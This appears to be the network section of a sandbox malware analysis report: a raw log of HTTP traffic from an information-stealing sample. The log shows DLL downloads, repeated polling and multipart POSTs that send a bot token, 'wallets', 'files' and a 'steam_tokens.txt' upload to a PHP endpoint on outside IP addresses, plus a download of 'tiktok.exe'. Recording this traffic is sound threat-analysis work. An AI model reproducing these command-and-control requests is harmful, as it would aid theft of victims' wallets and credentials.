Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGHJEBFBFHIIECAECGHHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCBAFCGDAAKFIDGIEGHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 47 2d 2d 0d 0a Data Ascii: ------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------EBGCBAFCGDAAKFIDGIEGContent-Disposition: form-data; name="message"wallets------EBGCBAFCGDAAKFIDGIEG--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"files------JEGHJDGIJECGDHJJECGH--
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFHDBFIDAECAAAKEGDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHCHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 2d 2d 0d 0a Data Ascii: ------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file"------HCFBFBAEBKJKEBGCAEHC--
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFCHost: 185.172.128.76Content-Length: 118931Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEHHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="message"her7h48r------CAKEBFCFIJJKKECAKJEH--
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
